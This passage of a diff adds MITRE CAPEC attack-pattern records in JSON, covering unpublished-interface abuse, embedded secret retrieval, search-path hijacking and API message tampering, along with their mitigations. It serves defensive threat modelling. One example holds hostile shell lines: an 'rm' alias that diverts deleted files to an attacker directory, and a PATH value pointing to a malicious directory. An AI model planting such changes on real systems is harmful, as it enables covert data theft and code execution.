Optionally, ability to capture output directly through synchronous communication or other method such as FTP." + ], + "x_capec_skills_required": { + "Low": "To identify and execute against an over-privileged system interface" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--1200590e-b7be-4a04-ba62-ad7e096eb725", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a4112a44-a0f9-4bde-bebe-74ed96c4cd3f", + "target_ref": "attack-pattern--9a7c6cbc-e3f9-4925-992e-f07e1359de87", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--8bc84555-2eda-4653-91db-ab12268de92f", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--16c78c78-dace-4fe3-ac4a-aaf188d14af5", + "target_ref": "attack-pattern--9a7c6cbc-e3f9-4925-992e-f07e1359de87", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--56425426-27c4-48cd-b76a-d1b3019fa7ab", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8fb32cf0-80fd-4e8b-91c6-0908041d5b6e", + "target_ref": "attack-pattern--9a7c6cbc-e3f9-4925-992e-f07e1359de87", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + 
"created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Implement host integrity monitoring to detect any unwanted altering of configuration files.", + "id": "course-of-action--601142e9-0c7b-4920-a60c-6abe2514f692", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-35-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--a6e454f6-6551-4cd7-9eab-0d1493966d59", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--601142e9-0c7b-4920-a60c-6abe2514f692", + "target_ref": "attack-pattern--9a7c6cbc-e3f9-4925-992e-f07e1359de87", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Ensure that files that are not required to execute, such as configuration files, are not over-privileged, i.e. 
not allowed to execute.", + "id": "course-of-action--2e6ab888-a935-4b5d-9efa-891f4cdf1b32", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-35-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--96960c02-bdf9-412d-94b3-3cc4487c9b4f", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--2e6ab888-a935-4b5d-9efa-891f4cdf1b32", + "target_ref": "attack-pattern--9a7c6cbc-e3f9-4925-992e-f07e1359de87", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary searches for and invokes interfaces or functionality that the target system designers did not intend to be publicly available. 
If interfaces fail to authenticate requests, the attacker may be able to invoke functionality they are not authorized for.", + "external_references": [ + { + "external_id": "CAPEC-36", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/36.html" + }, + { + "external_id": "CWE-306", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/306.html" + }, + { + "external_id": "CWE-693", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/693.html" + }, + { + "external_id": "CWE-695", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/695.html" + }, + { + "external_id": "CWE-1242", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1242.html" + } + ], + "id": "attack-pattern--d0db3641-ee0d-4897-89aa-3c85c69377a5", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Using Unpublished Interfaces or Functionality", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--f4186110-0c20-42fa-bc6f-d0ff9f700f91" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Read Data", + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Software", + "Hardware" + ], + "x_capec_example_instances": [ + "To an extent, Google services (such as Google Maps) are all well-known examples. Calling these services, or extending them for one's own (perhaps very different) purposes is as easy as knowing they exist. Their unencumbered public use, however, is a purposeful aspect of Google's business model. Most organizations, however, do not have the same business model. 
Organizations publishing services usually fall back on thoughts that Attackers \"will not know services exist\" and that \"even if they did, they wouldn't be able to access them because they're not on the local LAN.\" Simple threat modeling exercises usually uncovers simple attack vectors that can invalidate these assumptions." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Identify services: Discover a service of interest by exploring service registry listings or by connecting on a known port or some similar means.

  2. Techniques
    Search via internet for known, published services.
    Use automated tools to scan known ports to identify internet-enabled services.
    Dump the code from the chip and then perform reverse engineering to analyze the code.
  3. Authenticate to service: Authenticate to the service, if required, in order to explore it.

  4. Techniques
    Use published credentials to access system.
    Find unpublished credentials to access service.
    Use other attack pattern or weakness to bypass authentication.
  5. Identify all interfaces: Determine the exposed interfaces by querying the registry as well as probably sniffing to expose interfaces that are not explicitly listed.

  6. Techniques
    For any published services, determine exposed interfaces via the documentation provided.
    For any services found, use error messages from poorly formed service calls to determine valid interfaces. In some cases, services will respond to poorly formed calls with valid ones.

Experiment

  1. Attempt to discover unpublished functions: Using manual or automated means, discover unpublished or undocumented functions exposed by the service.

  2. Techniques
    Manually attempt calls to the service using an educated guess approach, including the use of terms like' 'test', 'debug', 'delete', etc.
    Use automated tools to scan the service to attempt to reverse engineer exposed, but undocumented, features.

Exploit

  1. Exploit unpublished functions: Using information determined via experimentation, exploit the unpublished features of the service.

  2. Techniques
    Execute features that are not intended to be used by general system users.
    Craft malicious calls to features not intended to be used by general system users that take advantage of security flaws found in the functions.
", + "x_capec_extended_description": "Adversaries can also search for undocumented bits on a hardware device, commonly known as \"chicken bits\". These bits are used to enable/disable certain functionality, but are not published. Adversaries can reverse engineer firmware to identify hidden features and change these bits at runtime to achieve malicious behavior.", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The architecture under attack must publish or otherwise make available services that clients can attach to, either in an unauthenticated fashion, or having obtained an authentication token elsewhere. The service need not be 'discoverable', but in the event it isn't it must have some way of being discovered by an attacker. This might include listening on a well-known port. Ultimately, the likelihood of exploit depends on discoverability of the vulnerable service." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack. Web service digging tools may be helpful." + ], + "x_capec_skills_required": { + "Low": "A number of web service digging tools are available for free that help discover exposed web services and their interfaces. In the event that a web service is not listed, the attacker does not need to know much more in addition to the format of web service messages that they can sniff/monitor for." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Authenticating both services and their discovery, and protecting that authentication mechanism simply fixes the bulk of this problem. 
Protecting the authentication involves the standard means, including: 1) protecting the channel over which authentication occurs, 2) preventing the theft, forgery, or prediction of authentication credentials or the resultant tokens, or 3) subversion of password reset and the like.", + "id": "course-of-action--a7decf96-7bb3-45ee-bb7d-833b443b59ed", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-36-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--fa411755-d981-4b14-9dbc-aed949041db7", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a7decf96-7bb3-45ee-bb7d-833b443b59ed", + "target_ref": "attack-pattern--d0db3641-ee0d-4897-89aa-3c85c69377a5", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker examines a target system to find sensitive data that has been embedded within it. 
This information can reveal confidential contents, such as account numbers or individual keys/credentials that can be used as an intermediate step in a larger attack.", + "external_references": [ + { + "external_id": "CAPEC-37", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/37.html" + }, + { + "external_id": "CWE-226", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/226.html" + }, + { + "external_id": "CWE-311", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/311.html" + }, + { + "external_id": "CWE-525", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/525.html" + }, + { + "external_id": "CWE-312", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/312.html" + }, + { + "external_id": "CWE-314", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/314.html" + }, + { + "external_id": "CWE-315", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/315.html" + }, + { + "external_id": "CWE-318", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/318.html" + }, + { + "external_id": "CWE-1239", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1239.html" + }, + { + "external_id": "CWE-1258", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1258.html" + }, + { + "external_id": "CWE-1266", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1266.html" + }, + { + "external_id": "CWE-1272", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1272.html" + }, + { + "external_id": "CWE-1278", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1278.html" + }, + { + "external_id": "CWE-1301", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1301.html" + }, + { + "external_id": "CWE-1330", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1330.html" + }, 
+ { + "description": "Data from Local System", + "external_id": "T1005", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1005" + }, + { + "description": "Unsecured Credentials: Private Keys", + "external_id": "T1552.004", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1552/004" + } + ], + "id": "attack-pattern--55ce63d0-6143-4b95-b70c-87c5b60aafa8", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Retrieve Embedded Sensitive Data", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_follow_refs": [ + "attack-pattern--3147f1c9-3043-40ca-ad42-c1be938820a4", + "attack-pattern--a8b4faf6-2e52-434f-95a4-df5f9bdc985a" + ], + "x_capec_child_of_refs": [ + "attack-pattern--d17eb5a5-1361-4e13-a969-e4d587d13b3d" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Read Data", + "Gain Privileges" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software", + "Physical Security", + "Hardware" + ], + "x_capec_example_instances": [ + "Using a tool such as 'strings' or similar to pull out text data, perhaps part of a database table, that extends beyond what a particular user's purview should be.", + "An attacker can also use a decompiler to decompile a downloaded Java applet in order to look for information such as hardcoded IP addresses, file paths, passwords or other such contents.", + "Attacker uses a tool such as a browser plug-in to pull cookie or other token information that, from a previous user at the same machine (perhaps a kiosk), allows the attacker to log in as the previous user." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Identify Target: Attacker identifies client components to extract information from. These may be binary executables, class files, shared libraries (e.g., DLLs), configuration files, or other system files.

  2. Techniques
    Binary file extraction. The attacker extracts binary files from zips, jars, wars, PDFs or other composite formats.
    Package listing. The attacker uses a package manifest provided with the software installer, or the filesystem itself, to identify component files suitable for attack.

Exploit

  1. Retrieve Embedded Data: The attacker then uses a variety of techniques, such as sniffing, reverse-engineering, and cryptanalysis to retrieve the information of interest.

  2. Techniques
    API Profiling. The attacker monitors the software's use of registry keys or other operating system-provided storage locations that can contain sensitive information.
    Execution in simulator. The attacker physically removes mass storage from the system and explores it using a simulator, external system, or other debugging harness.
    Common decoding methods. The attacker applies methods to decode such encodings and compressions as Base64, unzip, unrar, RLE decoding, gzip decompression and so on.
    Common data typing. The attacker looks for common file signatures for well-known file types (JPEG, TIFF, ASN.1, LDIF, etc.). If the signatures match, they attempt decoding in that format.
", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "In order to feasibly execute this type of attack, some valuable data must be present in client software.", + "Additionally, this information must be unprotected, or protected in a flawed fashion, or through a mechanism that fails to resist reverse engineering, statistical, or other attack." + ], + "x_capec_resources_required": [ + "The attacker must possess access to the system or code being exploited. Such access, for this set of attacks, will likely be physical. The attacker will make use of reverse engineering technologies, perhaps for data or to extract functionality from the binary. Such tool use may be as simple as \"Strings\" or a hex editor. Removing functionality may require the use of only a hex editor, or may require aspects of the toolchain used to construct the application: for instance the Adobe Flash development environment. Attacks of this nature do not require network access or undue CPU, memory, or other hardware-based resources." + ], + "x_capec_skills_required": { + "Medium": "The attacker must possess knowledge of client code structure as well as ability to reverse-engineer or decompile it or probe it in other ways. This knowledge is specific to the technology and language used for the client distribution" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This pattern of attack sees an adversary load a malicious resource into a program's standard path so that when a known command is executed then the system instead executes the malicious component. The adversary can either modify the search path a program uses, like a PATH variable or classpath, or they can manipulate resources on the path to point to their malicious components. 
J2EE applications and other component based applications that are built from multiple binaries can have very long list of dependencies to execute. If one of these libraries and/or references is controllable by the attacker then application controls can be circumvented by the attacker.", + "external_references": [ + { + "external_id": "CAPEC-38", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/38.html" + }, + { + "external_id": "CWE-426", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/426.html" + }, + { + "external_id": "CWE-427", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/427.html" + }, + { + "description": "Hijack Execution Flow: Path Interception by PATH Environment Variable", + "external_id": "T1574.007", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1574/007" + }, + { + "description": "Hijack Execution Flow: Path Interception by Unquoted Path", + "external_id": "T1574.009", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1574/009" + }, + { + "description": "G. Hoglund, G. 
McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--2e603682-c08c-4af1-8e06-329dc8bbe4b4", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Leveraging/Manipulating Configuration File Search Paths", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--d16af13f-5e0f-4a6b-bc1f-23f733d2229b" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Gain Privileges" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n Another method is to redirect commands by aliasing one legitimate command to another to create unexpected results. the Unix command \"rm\" could be aliased to \"mv\" and move all files the victim thinks they are deleting to a directory the attacker controls. In a Unix shell .profile setting\n alias rm=mv /usr/home/attacker\n In this case the attacker retains a copy of all the files the victim attempts to remove.\n ", + "\n A standard UNIX path looks similar to this\n /bin:/sbin:/usr/bin:/usr/local/bin:/usr/sbin\n If the attacker modifies the path variable to point to a locale that includes malicious resources then the user unwittingly can execute commands on the attackers' behalf:\n /evildir/bin:/sbin:/usr/bin:/usr/local/bin:/usr/sbin\n This is a form of usurping control of the program and the attack can be done on the classpath, database resources, or any other resources built from compound parts. 
At runtime detection and blocking of this attack is nearly impossible, because the configuration allows execution.\n " + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The attacker must be able to write to redirect search paths on the victim host." + ], + "x_capec_skills_required": { + "Low": "To identify and execute against an over-privileged system interface" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ef4b6415-f24e-432a-9f51-eb19c515d326", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a4112a44-a0f9-4bde-bebe-74ed96c4cd3f", + "target_ref": "attack-pattern--2e603682-c08c-4af1-8e06-329dc8bbe4b4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Ensure that the program's compound parts, including all system dependencies, classpath, path, and so on, are secured to the same or higher level assurance as the program", + "id": "course-of-action--22eb9bea-93ce-4bec-b575-33aa10b6766a", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-38-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f27d7fdd-9727-4b1e-852a-80cea8641b62", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": 
"mitigates", + "source_ref": "course-of-action--22eb9bea-93ce-4bec-b575-33aa10b6766a", + "target_ref": "attack-pattern--2e603682-c08c-4af1-8e06-329dc8bbe4b4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Host integrity monitoring", + "id": "course-of-action--58265fa6-0c01-42ec-a9a5-1e3535b9b8cb", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-38-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c212a3ad-89fe-4eec-b57a-6c1471eb8a8a", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--58265fa6-0c01-42ec-a9a5-1e3535b9b8cb", + "target_ref": "attack-pattern--2e603682-c08c-4af1-8e06-329dc8bbe4b4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary hosts an event within an application framework and then monitors the data exchanged during the course of the event for the purpose of harvesting any important data leaked during the transactions. One example could be harvesting lists of usernames or userIDs for the purpose of sending spam messages to those users. One example of this type of attack involves the adversary creating an event within the sub-application. Assume the adversary hosts a \"virtual sale\" of rare items. As other users enter the event, the attacker records via AiTM (CAPEC-94) proxy the user_ids and usernames of everyone who attends. 
The adversary would then be able to spam those users within the application using an automated script.", + "external_references": [ + { + "external_id": "CAPEC-383", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/383.html" + }, + { + "external_id": "CWE-311", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/311.html" + }, + { + "external_id": "CWE-319", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/319.html" + }, + { + "external_id": "CWE-419", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/419.html" + }, + { + "external_id": "CWE-602", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/602.html" + }, + { + "description": "Input Capture: Credential API Hooking", + "external_id": "T1056.004", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1056/004" + }, + { + "description": "Tom Stracener, Sean Barnum, So Many Ways [...]: Exploiting Facebook and YoVille, 2010, Defcon 18", + "external_id": "REF-327", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--2a8a634e-cf1f-4b2e-9a71-1ab8e6bb16d0", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Harvesting Information via API Event Monitoring", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_precede_refs": [ + "attack-pattern--38964770-4f39-4191-89cf-73a625162b2b" + ], + "x_capec_child_of_refs": [ + "attack-pattern--8b329689-f8f8-466e-a890-4e30b8d8ec30" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data (The adversary is able to gather information to potentially support further nefarious activities.)" + ] + }, + "x_capec_domains": [ + "Social Engineering", + "Social Engineering", + "Software" + ], + "x_capec_prerequisites": [ + "The target software is utilizing application framework APIs" + ], + 
"x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Leverage encryption techniques during information transactions so as to protect them from attack patterns of this kind.", + "id": "course-of-action--ef067fa3-03f9-4b2b-be2a-8afcd04006f5", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-383-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c553bedf-6dd2-4f6e-bb3f-680cd65f2c57", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ef067fa3-03f9-4b2b-be2a-8afcd04006f5", + "target_ref": "attack-pattern--2a8a634e-cf1f-4b2e-9a71-1ab8e6bb16d0", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker manipulates either egress or ingress data from a client within an application framework in order to change the content of messages. Performing this attack can allow the attacker to gain unauthorized privileges within the application, or conduct attacks such as phishing, deceptive strategies to spread malware, or traditional web-application attacks. The techniques require use of specialized software that allow the attacker to perform adversary-in-the-middle (CAPEC-94) communications between the web browser and the remote system. 
Despite the use of AiTH software, the attack is actually directed at the server, as the client is one node in a series of content brokers that pass information along to the application framework. Additionally, it is not true \"Adversary-in-the-Middle\" attack at the network layer, but an application-layer attack the root cause of which is the master applications trust in the integrity of code supplied by the client.", + "external_references": [ + { + "external_id": "CAPEC-384", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/384.html" + }, + { + "external_id": "CWE-471", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/471.html" + }, + { + "external_id": "CWE-345", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/345.html" + }, + { + "external_id": "CWE-346", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/346.html" + }, + { + "external_id": "CWE-602", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/602.html" + }, + { + "external_id": "CWE-311", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/311.html" + }, + { + "description": "Tom Stracener, Sean Barnum, So Many Ways [...]: Exploiting Facebook and YoVille, 2010, Defcon 18", + "external_id": "REF-327", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--ea07b1ea-c1b0-4923-8d25-a8fc39da040a", + "modified": "2021-06-24T00:00:00.000Z", + "name": "Application API Message Manipulation via Man-in-the-Middle", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_follow_refs": [ + "attack-pattern--414d0884-4f46-4a51-b4ea-72125c7f5f9e" + ], + "x_capec_child_of_refs": [ + "attack-pattern--38964770-4f39-4191-89cf-73a625162b2b" + ], + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_parent_of_refs": [ + 
"attack-pattern--0a899aed-6271-4cc9-8ffc-5c9575776731", + "attack-pattern--33370ee8-a290-42cc-b85d-5fd13f1f6fed" + ], + "x_capec_prerequisites": [ + "Targeted software is utilizing application framework APIs" + ], + "x_capec_resources_required": [ + "A software program that allows a user to man-in-the-middle communications between the client and server, such as a man-in-the-middle proxy." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker hosts or joins an event or transaction within an application framework in order to change the content of messages or items that are being exchanged. Performing this attack allows the attacker to manipulate content in such a way as to produce messages or content that look authentic but may contain deceptive links, substitute one item or another, spoof an existing item and conduct a false exchange, or otherwise change the amounts or identity of what is being exchanged. The techniques require use of specialized software that allow the attacker to man-in-the-middle communications between the web browser and the remote system in order to change the content of various application elements. Often, items exchanged in game can be monetized via sales for coin, virtual dollars, etc. 
The purpose of the attack is for the attack to scam the victim by trapping the data packets involved the exchange and altering the integrity of the transfer process.", + "external_references": [ + { + "external_id": "CAPEC-385", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/385.html" + }, + { + "external_id": "CWE-471", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/471.html" + }, + { + "external_id": "CWE-345", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/345.html" + }, + { + "external_id": "CWE-346", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/346.html" + }, + { + "external_id": "CWE-602", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/602.html" + }, + { + "external_id": "CWE-311", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/311.html" + }, + { + "description": "Tom Stracener, Sean Barnum, So Many Ways [...]: Exploiting Facebook and YoVille, 2010, Defcon 18", + "external_id": "REF-327", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--0a899aed-6271-4cc9-8ffc-5c9575776731", + "modified": "2021-06-24T00:00:00.000Z", + "name": "Transaction or Event Tampering via Application API Manipulation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--ea07b1ea-c1b0-4923-8d25-a8fc39da040a" + ], + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_prerequisites": [ + "Targeted software is utilizing application framework APIs" + ], + 